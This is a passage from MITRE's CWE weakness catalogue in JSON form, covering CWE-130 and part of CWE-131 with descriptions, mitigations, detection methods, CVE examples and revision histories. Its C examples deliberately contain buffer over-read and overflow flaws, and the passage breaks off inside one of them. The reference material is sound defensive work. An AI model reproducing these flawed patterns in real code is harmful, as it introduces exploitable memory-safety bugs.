Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Observed_Examples, Other_Notes, Potential_Mitigations, Theoretical_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Unchecked Array Indexing","attr":{"@_Date":"2009-10-29"}}}},"130":{"attr":{"@_ID":"130","@_Name":"Improper Handling of Length Parameter Inconsistency","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software parses a formatted message or structure, but it does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data.","Extended_Description":"If an attacker can manipulate the length parameter associated with an input such that it is inconsistent with the actual length of the input, this can be leveraged to cause the target application to behave in unexpected, and possibly, malicious ways. One of the possible motives for doing so is to pass in arbitrarily large input to the application. Another possible motivation is the modification of application state by including invalid data for subsequent properties of the application. Such weaknesses commonly lead to attacks such as buffer overflows and execution of arbitrary code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"240","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"805","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"length manipulation"},{"Term":"length tampering"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When processing structured incoming data containing a size field followed by raw data, ensure that you identify and resolve any inconsistencies between the size field and the actual size of the data."},{"Phase":"Implementation","Description":"Do not let the user control the size of the buffer."},{"Phase":"Implementation","Description":"Validate that the length of the user-supplied data is consistent with the buffer size."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) &gt; 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer &gt; BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index &lt; msg-&gt;msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg-&gt;msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-0160","Description":"Chain: \\"Heartbleed\\" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160"},{"Reference":"CVE-2009-2299","Description":"Web application firewall consumes excessive memory when an HTTP request contains a large Content-Length value but no POST data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2299"},{"Reference":"CVE-2001-0825","Description":"Buffer overflow in internal string handling routine allows remote attackers to execute arbitrary commands via a length argument of zero or less, which disables the length check.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0825"},{"Reference":"CVE-2001-1186","Description":"Web server allows remote attackers to cause a denial of service via an HTTP request with a content-length value that is larger than the size of the request, which prevents server from timing out the connection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1186"},{"Reference":"CVE-2001-0191","Description":"Service does not properly check the specified length of a cookie, which allows remote attackers to execute arbitrary commands via a buffer overflow, or brute force authentication by using a short cookie length.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0191"},{"Reference":"CVE-2003-0429","Description":"Traffic analyzer allows remote attackers to cause a denial of service and possibly execute arbitrary code via invalid IPv4 or IPv6 prefix lengths, possibly triggering a buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0429"},{"Reference":"CVE-2000-0655","Description":"Chat client allows remote attackers to cause a denial of service or execute arbitrary commands via a JPEG image containing a comment with an illegal field length of 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0655"},{"Reference":"CVE-2004-0492","Description":"Server allows remote attackers to cause a denial of service and possibly execute arbitrary code via a negative Content-Length HTTP header field causing a heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0492"},{"Reference":"CVE-2004-0201","Description":"Help program allows remote attackers to execute arbitrary commands via a heap-based buffer overflow caused by a .CHM file with a large length field","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0201"},{"Reference":"CVE-2003-0825","Description":"Name services does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. Can overlap zero-length issues","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0825"},{"Reference":"CVE-2004-0095","Description":"Policy manager allows remote attackers to cause a denial of service (memory consumption and crash) and possibly execute arbitrary code via an HTTP POST request with an invalid Content-Length value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0095"},{"Reference":"CVE-2004-0826","Description":"Heap-based buffer overflow in library allows remote attackers to execute arbitrary code via a modified record length field in an SSLv2 client hello message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0826"},{"Reference":"CVE-2004-0808","Description":"When domain logons are enabled, server allows remote attackers to cause a denial of service via a SAM_UAS_CHANGE request with a length value that is larger than the number of structures that are provided.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0808"},{"Reference":"CVE-2002-1357","Description":"Multiple SSH2 servers and clients do not properly handle packets or data elements with incorrect length specifiers, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1357"},{"Reference":"CVE-2004-0774","Description":"Server allows remote attackers to cause a denial of service (CPU and memory exhaustion) via a POST request with a Content-Length header set to -1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0774"},{"Reference":"CVE-2004-0989","Description":"Multiple buffer overflows in xml library that may allow remote attackers to execute arbitrary code via long URLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0989"},{"Reference":"CVE-2004-0568","Description":"Application does not properly validate the length of a value that is saved in a session file, which allows remote attackers to execute arbitrary code via a malicious session file (.ht), web site, or Telnet URL contained in an e-mail message, triggering a buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0568"},{"Reference":"CVE-2003-0327","Description":"Server allows remote attackers to cause a denial of service via a remote password array with an invalid length, which triggers a heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0327"},{"Reference":"CVE-2003-0345","Description":"Product allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0345"},{"Reference":"CVE-2004-0430","Description":"Server allows remote attackers to execute arbitrary code via a LoginExt packet for a Cleartext Password User Authentication Method (UAM) request with a PathName argument that includes an AFPName type string that is longer than the associated length field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0430"},{"Reference":"CVE-2005-0064","Description":"PDF viewer allows remote attackers to execute arbitrary code via a PDF file with a large /Encrypt /Length keyLength value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0064"},{"Reference":"CVE-2004-0413","Description":"SVN client trusts the length field of SVN protocol URL strings, which allows remote attackers to cause a denial of service and possibly execute arbitrary code via an integer overflow that leads to a heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0413"},{"Reference":"CVE-2004-0940","Description":"Is effectively an accidental double increment of a counter that prevents a length check conditional from exiting a loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940"},{"Reference":"CVE-2002-1235","Description":"Length field of a request not verified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1235"},{"Reference":"CVE-2005-3184","Description":"Buffer overflow by modifying a length value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3184"},{"Reference":"SECUNIA:18747","Description":"Length field inconsistency crashes cell phone.","Link":"http://secunia.com/advisories/18747/"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Length Parameter Inconsistency"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"47"}}},"Notes":{"Note":{"#text":"This probably overlaps other categories including zero-length issues.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Length Parameter Inconsistency","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Handle Length Parameter Inconsistency","attr":{"@_Date":"2009-03-10"}}]}},"131":{"attr":{"@_ID":"131","@_Name":"Incorrect Calculation of Buffer Size","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not correctly calculate the size to be used when allocating a buffer, which could lead to a buffer overflow.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"If the incorrect calculation is used in the context of memory allocation, then the software may create a buffer that is smaller or larger than expected. If the allocated buffer is smaller than expected, this could lead to an out-of-bounds read or write (CWE-119), possibly causing a crash, allowing arbitrary code execution, or exposing sensitive data."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting potential errors in buffer calculations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate","Effectiveness_Notes":"Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring follow-up manual methods to diagnose the underlying problem."},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source Code Quality Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When allocating a buffer for the purpose of transforming, converting, or encoding an input, allocate enough memory to handle the largest possible encoding. For example, in a routine that converts \\"&amp;\\" characters to \\"&amp;amp;\\" for HTML entity encoding, the output buffer needs to be at least 5 times as large as the input buffer."},{"attr":{"@_Mitigation_ID":"MIT-36"},"Phase":"Implementation","Description":{"xhtml:p":["Understand the programming language\'s underlying representation and how it interacts with numeric calculation (CWE-681). Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, \\"not-a-number\\" calculations, and how the language handles numbers that are too large or too small for its underlying representation. [REF-7]","Also be careful to account for 32-bit, 64-bit, and other potential differences that may affect the numeric representation."]}},{"attr":{"@_Mitigation_ID":"MIT-8"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Implementation","Description":"When processing structured incoming data containing a size field followed by raw data, identify and resolve any inconsistencies between the size field and the actual size of the data (CWE-130)."},{"Phase":"Implementation","Description":"When allocating memory that uses sentinels to mark the end of a data structure - such as NUL bytes in strings - make sure you also include the sentinel in your calculation of the total amount of memory that must be allocated."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131). Additionally, this only addresses potential overflow issues. Resource consumption / exhaustion issues are still possible."},{"Phase":"Implementation","Description":"Use sizeof() on the appropriate data type to avoid CWE-467."},{"Phase":"Implementation","Description":"Use the appropriate type for the desired action. For example, in C/C++, only use unsigned types for values that could never be negative, such as height, width, or other numbers related to quantity. This will simplify validation and will reduce surprises related to unexpected casting."},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Use libraries or frameworks that make it easier to handle numbers without unexpected consequences, or buffer allocation routines that automatically track buffer size.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). [REF-106]"]}},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-61] [REF-60].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-26"},"Phase":"Implementation","Strategy":"Compilation or Build Hardening","Description":"Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-20"},"Intro_Text":"The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int i;unsigned int numWidgets;Widget **WidgetList;numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets &gt; MAX_NUM_WIDGETS)) {}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf(\\"WidgetList ptr=%p\\\\n\\", WidgetList);for(i=0; i&lt;numWidgets; i++) {}WidgetList[numWidgets] = 